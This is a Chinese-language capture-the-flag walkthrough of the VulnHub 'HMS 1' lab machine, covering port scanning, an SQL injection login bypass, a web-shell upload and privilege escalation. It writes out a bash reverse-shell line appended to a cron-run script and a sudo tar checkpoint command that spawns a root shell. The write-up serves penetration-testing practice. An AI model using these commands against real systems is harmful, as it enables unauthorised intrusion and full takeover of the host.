前期準備：

靶機地址：https://www.vulnhub.com/entry/hms-1,728/

kali攻擊機ip：192.168.11.129
靶機ip：192.168.11.200

一、資訊收集

1.使用nmap對目標靶機進行掃描

發現開放了21、22和7080埠。

2. 21埠

裡面什麼也沒有。

3. 7080埠

看到一個表單，用弱密碼檢測了一番沒什麼結果，爆破了一會也沒爆破出來。

二、漏洞利用

在 email 中測試一下是否有 sql 注入漏洞：

不過前端頁面會做檢測，刪掉再做一下驗證：

刪掉 type 欄位：

登入：

登陸成功了。檢視網站內的資訊：

在主頁原始碼中發現了檔案上傳的路徑。

並且還發現了一個 settings.php 頁面，檢視一下：

發現可以上傳檔案，那就從 pentenstmonkey 複製了一個 webshell 上傳並監聽，上傳成功後訪問之前發現的檔案上傳目錄：

nc 連線成功。寫入互動式shell：

三、提權

檢視下有什麼使用者：

發現有 eren 和 nivek 兩個使用者，檢視一下可執行的檔案：

發現可以執行 /bin/bash，那就可以切換使用者：

成功切換到 eren 使用者，檢視許可權也檢視不了，不過在定時任務中有發現：

發現每隔五分鐘執行一次，可以用它來提權，在 /home/eren/backup.sh 中寫入 shell：

echo "bash -i >& /dev/tcp/192.168.11.129/1235 0>&1" >> backup.sh

nc 監聽：

檢視許可權：

發現以可以用 tar 進行提權：

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

提權成功，檢視 flag：